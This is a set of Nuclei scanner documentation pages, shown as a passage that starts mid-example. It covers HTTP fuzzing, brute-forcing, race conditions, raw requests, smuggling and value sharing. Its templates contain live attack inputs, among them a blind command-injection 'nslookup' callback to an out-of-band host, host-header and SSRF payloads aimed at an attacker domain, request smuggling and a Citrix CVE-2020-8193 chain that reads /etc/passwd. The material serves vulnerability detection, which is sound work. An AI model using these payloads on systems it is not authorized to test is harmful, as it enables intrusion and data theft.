fuzz:
X-Forwarded-For: "{{domain}}" # here {{domain}} is attacker-controlled server
X-Forwarded-Host: "{{domain}}"
Forwarded: "{{domain}}"
X-Real-IP: "{{domain}}"
X-Original-URL: "{{domain}}"
X-Rewrite-URL: "{{domain}}"
Host: "{{domain}}"
```
## Basic Host Header Injection
A simple template to discover host header injection issues.
```yaml
http:
# pre-condition to determine if the template should be executed
- pre-condition:
- type: dsl
dsl:
- 'method == "POST"' # only run if method is POST
- 'contains(path,"reset")' # only run if path contains reset word
condition: and
# fuzzing rules
fuzzing:
- part: header # This rule will be applied to the header
type: replace # replace the type of rule (i.e., existing values will be replaced with payload)
mode: multiple # multiple mode (i.e., all existing values will be replaced/used at once)
fuzz:
X-Forwarded-For: "{{domain}}" # here {{domain}} is attacker-controlled server
X-Forwarded-Host: "{{domain}}"
Forwarded: "{{domain}}"
X-Real-IP: "{{domain}}"
X-Original-URL: "{{domain}}"
X-Rewrite-URL: "{{domain}}"
Host: "{{domain}}"
```
## Blind SSRF OOB Detection
A simple template to detect blind SSRF in known parameters using interactsh with HTTP fuzzing.
```yaml
id: fuzz-ssrf
info:
name: Basic Blind SSRF Detection
author: pdteam
severity: low
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # only run on GET URLs
payloads:
redirect:
- "{{interactsh-url}}"
fuzzing:
- part: query
type: replace
mode: single
keys:
- "dest"
- "redirect"
- "uri"
- "path"
- "continue"
- "url"
- "window"
- "next"
- "data"
- "reference"
- "site"
- "html"
- "val"
- "validate"
- "domain"
- "callback"
- "return"
- "page"
- "feed"
- "host"
- "port"
- "to"
- "out"
- "view"
- "dir"
- "show"
- "navigation"
- "open"
fuzz:
- "https://{{redirect}}"
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "http"
```
## Blind CMDi OOB based detection
A simple template to detect blind CMDi using interactsh.
```yaml
id: fuzz-cmdi
info:
name: Basic Blind CMDI Detection
author: pdteam
severity: low
http:
- method: GET
path:
- "{{BaseURL}}"
payloads:
redirect:
- "{{interactsh-url}}"
fuzzing:
fuzz:
- "nslookup {{redirect}}"
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
```
# Fuzzing Overview
Source: https://docs.projectdiscovery.io/templates/protocols/http/fuzzing-overview
Learn about fuzzing HTTP requests with Nuclei
Nuclei supports fuzzing of HTTP requests based on rules defined in the `fuzzing` section of the HTTP request. This allows creating templates for generic web application vulnerabilities like SQLi, SSRF, CMDi, etc. without any prior information about the target, like a classic web fuzzer. We call this concept **Fuzzing for Unknown Vulnerabilities**.
### pre-condition
More often than not, we want to only attempt fuzzing on those requests where it makes sense. For example,
* Fuzz Body When Body is Present
* Ignore PreFlight and CONNECT requests
and so on. With Nuclei v3.2.4 we have introduced a new `pre-condition` section which defines the conditions under which the fuzzing template should be executed.
pre-conditions can be considered a twin of [matchers](/templates/reference/matchers) in nuclei. They support all matcher types, including DSL; the only difference is that they serve a different purpose: deciding whether the fuzzing template should be executed at all.
For example, to only execute the template on POST requests with a non-empty body, you can use the following filter.
```yaml
- pre-condition:
- type: dsl
dsl:
- method == POST
- len(body) > 0
condition: and
```
Currently, only request data like header, host, input, method, path, etc. is available, but response data will become available once support for loading the response along with the request is added.
When writing/executing a template, you can use the `-v -svd` flags to see all variables available in filters before applying the filter.
### Part
Part specifies what part of the request should be fuzzed based on the specified rules. Available options for this parameter are -
**query** (`default`) - fuzz query parameters for URL
```yaml
fuzzing:
- part: query # fuzz parameters in URL query
```
**path** - fuzz path parameters for requests
```yaml
fuzzing:
- part: path # fuzz path parameters
```
**header** - fuzz header parameters for requests
```yaml
fuzzing:
- part: header # fuzz headers
```
**cookie** - fuzz cookie parameters for requests
```yaml
fuzzing:
- part: cookie # fuzz cookies
```
**body** - fuzz body parameters for requests
```yaml
fuzzing:
- part: body # fuzz parameters in body
```
#### Special Part
**request** - fuzz the entire request (all parts mentioned above)
```yaml
fuzzing:
- part: request # fuzz entire request
```
#### Multiple selective parts
Multiple parts can be selected for fuzzing by defining a `parts` field, the plural of `part`, which allows multiple selected parts to be fuzzed.
```yaml
fuzzing:
- parts:
- query
- body
- header
```
### Type
Type specifies the type of replacement to perform for the fuzzing rule value. Available options for this parameter are -
1. **replace** (`default`) - replace the value with payload
2. **prefix** - prefix the value with payload
3. **postfix** - postfix the value with payload
4. **infix** - infix the value with payload (place in between)
5. **replace-regex** - replace the value with payload using regex
```yaml
fuzzing:
- part: query
type: postfix # Fuzz query and postfix payload to params
```
### Key-Value Abstraction
In an HTTP request, there are various parts like query, path, headers, cookies, and body, and each part comes in various formats. For example, the query part is a set of key-value pairs, the path part is a list of values, and the body part can be JSON, XML, or form-data.
To effectively abstract these parts and allow them to be fuzzed, Nuclei exposes these values as `key` and `value` pairs. This allows users to fuzz based on the key or value of the request part.
For example, the sample HTTP request below can be abstracted into the key-value pairs shown after it.
```http
POST /reset-password?token=x0x0x0&source=app HTTP/1.1
Host: 127.0.0.1:8082
User-Agent: Go-http-client/1.1
Cookie: PHPSESSID=1234567890
Content-Length: 23
Content-Type: application/json
Accept-Encoding: gzip
Connection: close
{"password":"12345678"}
```
* **`part: Query`**
| key | value |
| ------ | ------ |
| token | x0x0x0 |
| source | app |
* **`part: Path`**
| key | value |
| ----- | --------------- |
| value | /reset-password |
* **`part: Header`**
| key | value |
| --------------- | ------------------ |
| Host | 127.0.0.1:8082 |
| User-Agent | Go-http-client/1.1 |
| Content-Length | 23 |
| Content-Type | application/json |
| Accept-Encoding | gzip |
| Connection | close |
* **`part: Cookie`**
| key | value |
| --------- | ---------- |
| PHPSESSID | 1234567890 |
* **`part: Body`**
| key | value |
| -------- | -------- |
| password | 12345678 |
**Note:** XML, JSON, form, and multipart form-data bodies will be in key-value format, but if the body is binary or in any other format, the entire body will be represented as a single key-value pair with the key `value` and the value being the entire body.
| key | value |
| ----- | -------------------------- |
| value | "\x08\x96\x01\x12\x07\x74" |
This abstraction really levels up the game, since you only need to write a single rule for the body and it will be applied to all formats. For example, if you check for SQLi in body values, a single rule will work on all formats, i.e. JSON, XML, form, multipart form-data, etc., as sketched below.
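A minimal sketch of such a single body rule (the payload is illustrative):
```yaml
fuzzing:
  - part: body
    type: postfix
    mode: single
    fuzz:
      - "'"
```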
### Mode
Mode specifies the mode in which to perform the replacements. Available modes are -
1. **multiple** (`default`) - replace all values at once
2. **single** - replace one value at a time
```yaml
fuzzing:
- part: query
type: postfix
mode: multiple # Fuzz query postfixing payloads to all parameters at once
```
> **Note**: default values are set/used when other options are not defined.
### Component Data Filtering
Multiple filters are supported to restrict the scope of fuzzing to only interesting parameter keys and values. Nuclei HTTP Fuzzing engine converts request parts into Keys and Values which then can be filtered by their related options.
The following filter fields are supported -
1. **keys** - list of parameter names to fuzz (exact match)
2. **keys-regex** - list of parameter regex to fuzz
3. **values** - list of value regex to fuzz
These filters can be used in combination to run highly targeted fuzzing based on the parameter input. A few examples of such filtering are provided below.
```yaml
# fuzzing command injection based on parameter name value
fuzzing:
- part: query
type: replace
mode: single
keys:
- "daemon"
- "upload"
- "dir"
- "execute"
- "download"
- "log"
- "ip"
- "cli"
- "cmd"
```
```yaml
# fuzzing openredirects based on parameter name regex
fuzzing:
- part: query
type: replace
mode: single
keys-regex:
- "redirect.*"
```
```yaml
# fuzzing ssrf based on parameter value regex
fuzzing:
- part: query
type: replace
mode: single
values:
- "https?://.*"
```
### Fuzz
Fuzz specifies the values to replace with a `type` for a parameter. It supports payloads, DSL functions, etc and allows users to fully utilize the existing nuclei feature-set for fuzzing purposes.
```yaml
# fuzz section for xss fuzzing with stop-at-first-match
payloads:
reflection:
- "6842'\"><9967"
stop-at-first-match: true
fuzzing:
- part: query
type: postfix
mode: single
fuzz:
- "{{reflection}}"
```
```yaml
# using interactsh-url placeholder for oob testing
payloads:
redirect:
- "{{interactsh-url}}"
fuzzing:
- part: query
type: replace
mode: single
keys:
- "dest"
- "redirect"
- "uri"
fuzz:
- "https://{{redirect}}"
```
```yaml
# using template-level variables for SSTI testing
variables:
first: "{{rand_int(10000, 99999)}}"
second: "{{rand_int(10000, 99999)}}"
result: "{{to_number(first)*to_number(second)}}"
http:
...
payloads:
reflection:
- '{{concat("{{", "§first§*§second§", "}}")}}'
fuzzing:
- part: query
type: postfix
mode: multiple
fuzz:
- "{{reflection}}"
```
### Analyzer
Analyzers are a new concept introduced in nuclei fuzzing which allows the engine to make additional verification requests based on certain logic to verify the vulnerability.
#### time\_delay
The `time_delay` analyzer verifies that the response time of the request is controllable by the fuzzed payload. It uses a linear regression algorithm ported from ZAP with alternating requests to determine whether the server response time is actually controllable rather than just noise. You can configure it like so:
```yaml
# Create a new time delay analyzer
analyzer:
name: time_delay
# Optionally, you can define parameters for the
# analyzer like below.
#
# the defaults are good enough for most use cases.
parameters:
sleep_duration: 10 # sleep for 10 seconds (default: 5)
requests_limit: 6 # make 6 verification requests (default: 4)
time_correlation_error_range: 0.30 # error range for time correlation (default: 0.15)
time_slope_error_range: 0.40 # error range for time slope (default: 0.30)
```
The following dynamic placeholders are available in payloads with the `time_delay` analyzer.
* `[SLEEPTIME]` - The sleep time in seconds for the time delay analyzer.
* `[INFERENCE]` - The inference condition (%d=%d) for the time delay analyzer.
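For illustration, a minimal sketch of a payload using the `[SLEEPTIME]` placeholder together with the analyzer (the injection string is only an example):
```yaml
payloads:
  injection:
    - "' AND sleep([SLEEPTIME]) -- "
analyzer:
  name: time_delay
fuzzing:
  - part: query
    type: postfix
    mode: single
    fuzz:
      - "{{injection}}"
```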
These placeholders are substituted at runtime with the actual values used by the analyzer. A typical verification process looks like this:
1. Send the request with the payload to the target with a 5 second delay.
2. If the response time is less than 5 seconds, do nothing.
3. Send the request to the analyzer, which queues it with a 5 second delay.
4. Next, a 1 second delay.
5. Next, a 5 second delay.
6. Finally, the last 1 second delay.
If the response time is controllable, the analyzer will report the vulnerability.
Matching on the analyzer result is pretty straightforward as well. Similar to interactsh, you can use `part: analyzer` to match the analyzer response.
```yaml
matchers:
- type: word
part: analyzer
words:
- "true"
```
Optionally, you can also extract the `analyzer_details` from the analyzer for matches.
### Example **Fuzzing** template
An example template for fuzzing XSS vulnerabilities is provided below.
```yaml
id: fuzz-reflection-xss
info:
name: Basic Reflection Potential XSS Detection
author: pdteam
severity: low
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # only run if method is GET
payloads:
reflection:
- "6842'\"><9967"
stop-at-first-match: true
fuzzing:
- part: query
type: postfix
mode: single
fuzz:
- "{{reflection}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{reflection}}"
- type: word
part: header
words:
- "text/html"
```
More complete examples are provided [here](/templates/protocols/http/fuzzing-examples)
# HTTP Payloads
Source: https://docs.projectdiscovery.io/templates/protocols/http/http-payloads
Learn about bruteforcing HTTP requests using payloads with Nuclei
## Overview
The Nuclei engine supports brute forcing any value/component of HTTP requests using the payloads module, which allows running various types of payloads in multiple formats. It's possible to define placeholders with simple keywords (or using brackets `{{helper_function(variable)}}` in case mutator functions are needed), and perform **batteringram**, **pitchfork** and **clusterbomb** attacks.
The **wordlist** for these attacks needs to be defined during the request definition under the `payloads` field, with a name matching the keyword. Nuclei supports both file-based and in-template wordlists. Finally, all DSL functionalities are fully available and supported, and can be used to manipulate the final values.
Payloads are defined using a variable name and can be referenced in the request between `{{ }}` markers.
### Difference between **HTTP Payloads** and **HTTP Fuzzing**
While both may sound similar, the major difference between **Fuzzing** and **Payloads/BruteForce** is that fuzzing is a superset of payloads/brute force, with extra features related to finding unknown vulnerabilities, while payloads is just plain brute forcing of values with a given attack type and set of payloads.
## Examples
An example of using payloads with a local wordlist:
```yaml
# HTTP Intruder fuzzing using local wordlist.
payloads:
paths: params.txt
header: local.txt
```
An example of using payloads with in-template wordlist support:
```yaml
# HTTP Intruder fuzzing using in template wordlist.
payloads:
password:
- admin
- guest
- password
```
**Note:** Be careful while selecting the attack type, as unexpected input will break the template.
For example, if you use `clusterbomb` or `pitchfork` as the attack type and define only one variable in the payload section, the template will fail to compile, as `clusterbomb` and `pitchfork` expect more than one variable to be used in the template.
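For reference, a minimal sketch of a valid `pitchfork` setup with two payload sets (the wordlist file paths are illustrative):
```yaml
attack: pitchfork
payloads:
  username: wordlists/usernames.txt
  password: wordlists/passwords.txt
```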
## Attack mode
The Nuclei engine supports multiple attack types, including `batteringram` as the default type, which is generally used to fuzz a single parameter, and `clusterbomb` and `pitchfork` for fuzzing multiple parameters, which work the same way as the classic Burp Intruder attack types.
| **Type** | batteringram | pitchfork | clusterbomb |
| ----------- | ------------ | --------- | ----------- |
| **Support** | ✔ | ✔ | ✔ |
### batteringram
The battering ram attack type places the same payload value in all positions. It uses only one payload set. It loops through the payload set and replaces all positions with the payload value.
### pitchfork
The pitchfork attack type uses one payload set for each position. It places the first payload in the first position, the second payload in the second position, and so on.
It then loops through all payload sets at the same time. The first request uses the first payload from each payload set, the second request uses the second payload from each payload set, and so on.
### clusterbomb
The cluster bomb attack tries all different combinations of payloads. It still puts the first payload in the first position and the second payload in the second position, but when it loops through the payload sets, it tries all combinations.
This attack type is useful for a brute-force attack. Load a list of commonly used usernames in the first payload set, and a list of commonly used passwords in the second payload set. The cluster bomb attack will then try all combinations.
More details [here](https://www.sjoerdlangkemper.nl/2017/08/02/burp-intruder-attack-types/).
## Attack Mode Example
An example of using the `clusterbomb` attack to fuzz:
```yaml
http:
- raw:
- |
POST /?file={{path}} HTTP/1.1
User-Agent: {{header}}
Host: {{Hostname}}
attack: clusterbomb # Defining HTTP fuzz attack type
payloads:
path: helpers/wordlists/prams.txt
header: helpers/wordlists/header.txt
```
# HTTP Payloads Examples
Source: https://docs.projectdiscovery.io/templates/protocols/http/http-payloads-examples
Review some HTTP payload examples for Nuclei
## HTTP Intruder Bruteforcing
This template makes a defined POST request in raw format along with in-template defined payloads, running the `clusterbomb` intruder and checking for a string match against the response.
```yaml
id: multiple-raw-example
info:
name: Test RAW Template
author: pdteam
severity: info
# HTTP Intruder bruteforcing with in template payload support.
http:
- raw:
- |
POST /?username=§username§&paramb=§password§ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
Host: {{Hostname}}
another_header: {{base64('§password§')}}
Accept: */*
body=test
payloads:
username:
- admin
password:
- admin
- guest
- password
- test
- 12345
- 123456
attack: clusterbomb # Available: batteringram,pitchfork,clusterbomb
matchers:
- type: word
words:
- "Test is test matcher text"
```
## BruteForcing multiple requests
This template makes a defined POST request in raw format along with wordlist-based payloads, running the `clusterbomb` intruder and checking for a string match against the response.
```yaml
id: multiple-raw-example
info:
name: Test RAW Template
author: pdteam
severity: info
http:
- raw:
- |
POST /?param_a=§param_a§&paramb=§param_b§ HTTP/1.1
User-Agent: §param_a§
Host: {{Hostname}}
another_header: {{base64('§param_b§')}}
Accept: */*
admin=test
- |
DELETE / HTTP/1.1
User-Agent: nuclei
Host: {{Hostname}}
{{sha256('§param_a§')}}
- |
PUT / HTTP/1.1
Host: {{Hostname}}
{{html_escape('§param_a§')}} + {{hex_encode('§param_b§')}}
attack: clusterbomb # Available types: batteringram,pitchfork,clusterbomb
payloads:
param_a: payloads/prams.txt
param_b: payloads/paths.txt
matchers:
- type: word
words:
- "Test is test matcher text"
```
## Authenticated Bruteforcing
This template makes subsequent HTTP requests with the defined raw requests, maintaining sessions between each request and checking for a string match against the response.
```yaml
id: multiple-raw-example
info:
name: Test RAW Template
author: pdteam
severity: info
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /testing HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
testing=parameter
cookie-reuse: true # Cookie-reuse maintain the session between all request like browser.
matchers:
- type: word
words:
- "Test is test matcher text"
```
# Race Conditions
Source: https://docs.projectdiscovery.io/templates/protocols/http/race-conditions
Learn about using race conditions with Nuclei
Race conditions are another class of bugs not easily automated via traditional tooling. Burp Suite introduced a gate mechanism in Turbo Intruder, where all the bytes for all the requests except the last one are sent first, and the final byte is then sent together for all requests, synchronizing the send event.
We have implemented the **gate** mechanism in the nuclei engine and allow it to be run via templates, which makes testing for this specific bug class simple and portable.
To enable the race condition check within a template, the `race` attribute can be set to `true`, and `race_count` defines the number of simultaneous requests you want to initiate.
Below is an example template where the same request is repeated 10 times using the gate logic.
```yaml
id: race-condition-testing
info:
name: Race condition testing
author: pdteam
severity: info
http:
- raw:
- |
POST /coupons HTTP/1.1
Host: {{Hostname}}
promo_code=20OFF
race: true
race_count: 10
matchers:
- type: status
part: header
status:
- 200
```
You can simply replace the `POST` request with any suspected vulnerable request and change the `race_count` as per your need, and it's ready to run.
```bash
nuclei -t race.yaml -target https://api.target.com
```
**Multi request race condition testing**
For the scenario where multiple requests need to be sent in order to exploit the race condition, we can make use of threads.
```yaml
threads: 5
race: true
```
`threads` is the total number of requests you want to make with the template to perform race condition testing.
Below is an example template where multiple (5) unique requests will be sent at the same time using the gate logic.
```yaml
id: multi-request-race
info:
name: Race condition testing with multiple requests
author: pd-team
severity: info
http:
- raw:
- |
POST / HTTP/1.1
Pragma: no-cache
Host: {{Hostname}}
Cache-Control: no-cache, no-transform
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
id=1
- |
POST / HTTP/1.1
Pragma: no-cache
Host: {{Hostname}}
Cache-Control: no-cache, no-transform
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
id=2
- |
POST / HTTP/1.1
Pragma: no-cache
Host: {{Hostname}}
Cache-Control: no-cache, no-transform
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
id=3
- |
POST / HTTP/1.1
Pragma: no-cache
Host: {{Hostname}}
Cache-Control: no-cache, no-transform
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
id=4
- |
POST / HTTP/1.1
Pragma: no-cache
Host: {{Hostname}}
Cache-Control: no-cache, no-transform
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
id=5
threads: 5
race: true
```
More complete examples are provided [here](/templates/protocols/http/http-race-condition-examples)
# Raw HTTP Protocol
Source: https://docs.projectdiscovery.io/templates/protocols/http/raw-http
Learn about using Raw HTTP with Nuclei
Another way to create requests is using raw requests, which come with more flexibility and support for DSL helper functions, like the following ones (as of now it's suggested to leave the `Host` header as in the example, with the variable `{{Hostname}}`). All the matcher and extractor capabilities can be used with raw requests in the same way as described above.
```yaml
http:
- raw:
- |
POST /path2/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
a=test&b=pd
```
Requests can be fine-tuned to perform the exact tasks as desired. Nuclei requests are fully configurable meaning you can configure and define each and every single thing about the requests that will be sent to the target servers.
The raw request format also supports [various helper functions](/templates/reference/helper-functions/), letting us do runtime manipulation of the input. An example of using a helper function in the header:
```yaml
- raw:
- |
GET /manager/html HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64('username:password')}} # Helper function to encode input at run time.
```
To make a request to the URL specified as input without any additional tampering, a blank request URI can be used as specified below, which will make the request to the user-specified input.
```yaml
- raw:
- |
GET HTTP/1.1
Host: {{Hostname}}
```
More complete examples are provided [here](/templates/protocols/http/raw-http-examples)
# Request Tampering
Source: https://docs.projectdiscovery.io/templates/protocols/http/request-tampering
Learn about request tampering in HTTP with Nuclei
## Requests Annotation
Request inline annotations allow overriding properties/behavior on a per-request basis. They are very similar to Python/Java class annotations and must be put in the request just before the RFC line. Currently, only the following overrides are supported:
* `@Host:` which overrides the real target of the request (usually the host/ip provided as input). It supports syntax with ip/domain, port, and scheme, for example: `domain.tld`, `domain.tld:port`, `http://domain.tld:port`
* `@tls-sni:` which overrides the SNI Name of the TLS request (usually the hostname provided as input). It supports any literals. The special value `request.host` uses the `Host` header and `interactsh-url` uses an interactsh generated URL.
* `@timeout:` which overrides the timeout for the request to a custom duration. It supports durations formatted as string. If no duration is specified, the default Timeout flag value is used.
The following example shows the annotations within a request:
```yaml
- |
@Host: https://projectdiscovery.io:443
POST / HTTP/1.1
Pragma: no-cache
Host: {{Hostname}}
Cache-Control: no-cache, no-transform
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
```
This is particularly useful, for example, in the case of templates with multiple requests, where one request after the initial one needs to be performed to a specific host (for example, to check an API validity):
```yaml
http:
- raw:
# this request will be sent to {{Hostname}} to get the token
- |
GET /getkey HTTP/1.1
Host: {{Hostname}}
# This request will be sent instead to https://api.target.com:443 to verify the token validity
- |
@Host: https://api.target.com:443
GET /api/key={{token}} HTTP/1.1
Host: api.target.com:443
extractors:
- type: regex
name: token
part: body
regex:
# random extractor of strings between prefix and suffix
- 'prefix(.*)suffix'
matchers:
- type: word
part: body
words:
- valid token
```
Example of a custom `timeout` annotation:
```yaml
- |
@timeout: 25s
POST /conf_mail.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M
```
Example of the `sni` annotation with `interactsh-url`:
```yaml
- |
@tls-sni: interactsh-url
POST /conf_mail.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M
```
## Smuggling
HTTP smuggling is a class of web attacks recently made popular by [Portswigger’s Research](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn) into the topic. For an in-depth overview, please visit the article linked above.
In the open source space, detecting HTTP smuggling is difficult, particularly due to the requests for detection being malformed by nature. Nuclei is able to reliably detect HTTP smuggling vulnerabilities utilising the [rawhttp](https://github.com/projectdiscovery/rawhttp) engine.
The most basic example of an HTTP smuggling vulnerability is CL.TE smuggling. An example template to detect a CL.TE HTTP smuggling vulnerability is provided below, using the `unsafe: true` attribute for rawhttp based requests.
```yaml
id: CL-TE-http-smuggling
info:
name: HTTP request smuggling, basic CL.TE vulnerability
author: pdteam
severity: info
reference: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
http:
- raw:
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked
0
G
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked
0
G
unsafe: true
matchers:
- type: word
words:
- 'Unrecognized method GPOST'
```
More complete examples are provided [here](/templates/protocols/http/http-smuggling-examples)
# Unsafe HTTP
Source: https://docs.projectdiscovery.io/templates/protocols/http/unsafe-http
Learn about using rawhttp or unsafe HTTP with Nuclei
Nuclei supports [rawhttp](https://github.com/projectdiscovery/rawhttp) for complete request control and customization allowing **any kind of malformed requests** for issues like HTTP request smuggling, Host header injection, CRLF with malformed characters and more.
**rawhttp** library is disabled by default and can be enabled by including `unsafe: true` in the request block.
Here is an example of HTTP request smuggling detection template using `rawhttp`.
```yaml
http:
- raw:
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
Transfer-Encoding: chunked
0
GET /post?postId=5 HTTP/1.1
User-Agent: a"/>
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
x=1
- |+
GET /post?postId=5 HTTP/1.1
Host: {{Hostname}}
unsafe: true # Enables rawhttp client
matchers:
- type: dsl
dsl:
- 'contains(body, "")'
```
# Value Sharing
Source: https://docs.projectdiscovery.io/templates/protocols/http/value-sharing
Learn about sharing values between HTTP requests in the HTTP template.
## HTTP Value Sharing
In Nuclei, it is possible to extract a value from one HTTP request and share/reuse it in another HTTP request. This has various use cases like logins, CSRF tokens, and other complex multi-step flows.
This concept of value sharing is possible using [Dynamic Extractors](/templates/reference/extractors#dynamic-extractor). Here's a simple example demonstrating value sharing between HTTP requests.
This template makes subsequent HTTP requests while maintaining sessions between each request, dynamically extracting data from one request and reusing it in another request using the variable name, and checking for a string match against the response.
```yaml
id: CVE-2020-8193
info:
name: Citrix unauthenticated LFI
author: pdteam
severity: high
reference: https://github.com/jas502n/CVE-2020-8193
http:
- raw:
- |
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/xml
X-NITRO-USER: xpyZxwy6
X-NITRO-PASS: xWXHUJ56
- |
GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
- |
GET /menu/neo HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
- |
GET /menu/stc HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
- |
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: oY39DXzQ
X-NITRO-PASS: ZuU9Y9c1
rand_key: §randkey§
- |
POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: oY39DXzQ
X-NITRO-PASS: ZuU9Y9c1
rand_key: §randkey§
cookie-reuse: true # Using cookie-reuse to maintain session between each request, same as browser.
extractors:
- type: regex
name: randkey # Variable name
part: body
internal: true
regex:
- "(?m)[0-9]{3,10}\\.[0-9]+"
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
```
# JavaScript Protocol Introduction
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/introduction
Learn more about using JavaScript with Nuclei v3
## Introduction
Nuclei and the ProjectDiscovery community thrive on the ability to write exploits/checks in a fast and simple YAML format. We work consistently to improve our **Nuclei templates** to encourage those as the standard for writing security checks. We understand the limitations and are always working to address those, while we work on expanding our capabilities.
Nuclei currently supports writing templates for complex HTTP, DNS, and SSL protocol exploits/checks through a powerful and easy-to-use DSL in the Nuclei engine. However, we understand that the current support may not be enough for addressing vulnerabilities across all protocols and in non-remote domains of security like local privilege escalation checks, kernel exploits, etc.
To address this, Nuclei v3 includes an embedded runtime for JavaScript that is tailored for **Nuclei** with the help of **[Goja](https://github.com/dop251/goja)**.
## Features
**Support for provider or driver-specific exploits**
Some vulnerabilities are specific to software or a driver. For example, a Redis buffer overflow exploit, an exploit of specific VPN software, or exploits that are not part of the Internet Engineering Task Force (IETF) standard protocols.
Since these are not standard protocols they are not typically added to Nuclei. Detection for these types of exploits cannot be written using a 'network' protocol.
They are often very complex to write and detection for these exploits can be written by exposing the required library in Nuclei (if not already present). We now provide support for writing detection of these types of exploits with JavaScript.
**Non-network checks**
Security is not limited to network exploits. Nuclei provides support for security beyond network issues like:
* Local privilege escalation checks
* Kernel exploits
* Account misconfigurations
* System misconfigurations
**Complex network protocol exploits**
Some network exploits are very complex to write due to nature of the protocol or exploit itself. For example [CVE-2020-0796](https://nvd.nist.gov/vuln/detail/cve-2020-0796) requires you to manually construct a packet.
Detection for these exploits is usually written in Python but now can be written in JavaScript.
**Multi-step exploits**
LDAP or Kerberos exploits usually involve a multi-step process of authentication and are difficult to write in YAML-based DSL. JavaScript support makes this easier.
**Scalable and maintainable exploits**
One-off exploit detections written in code are not scalable and maintainable due to the nature of the language, boilerplate code, and other factors. Our goal is to provide the tools that allow you to write the **minimum** code required to run detection of the exploit and let Nuclei do the rest.
**Leveraging Turing complete language**
While the YAML-based DSL is powerful and easy to use, it is not Turing complete and has its own limitations. JavaScript is Turing complete, thus users who are already familiar with JavaScript can write network and other exploit detections without learning a new DSL or hacking around the existing DSL.
## Requirements
* A basic knowledge of JavaScript (loops, functions, arrays) is required to write a JavaScript protocol template
* Nuclei v3.0.0 or above
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/bytes
# Namespace: bytes
## Table of contents
### Classes
* [Buffer](/templates/protocols/javascript/modules/bytes.Buffer)
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/fs
# Namespace: fs
## Table of contents
### Functions
* [ListDir](/templates/protocols/javascript/modules/fs#listdir)
* [ReadFile](/templates/protocols/javascript/modules/fs#readfile)
* [ReadFileAsString](/templates/protocols/javascript/modules/fs#readfileasstring)
* [ReadFilesFromDir](/templates/protocols/javascript/modules/fs#readfilesfromdir)
## Functions
### ListDir
▸ **ListDir**(`path`, `itemType`): `string`\[] | `null`
ListDir lists itemType values within a directory
depending on the itemType provided
itemType can be any one of \['file', 'dir', '']
#### Parameters
| Name | Type |
| :--------- | :------- |
| `path` | `string` |
| `itemType` | `string` |
#### Returns
`string`\[] | `null`
**`Example`**
```javascript
const fs = require('nuclei/fs');
// this will only return files in /tmp directory
const files = fs.ListDir('/tmp', 'file');
```
**`Example`**
```javascript
const fs = require('nuclei/fs');
// this will only return directories in /tmp directory
const dirs = fs.ListDir('/tmp', 'dir');
```
**`Example`**
```javascript
const fs = require('nuclei/fs');
// when no itemType is provided, it will return both files and directories
const items = fs.ListDir('/tmp');
```
#### Defined in
fs.ts:26
***
### ReadFile
▸ **ReadFile**(`path`): `Uint8Array` | `null`
ReadFile reads file contents within permitted paths
and returns content as byte array
#### Parameters
| Name | Type |
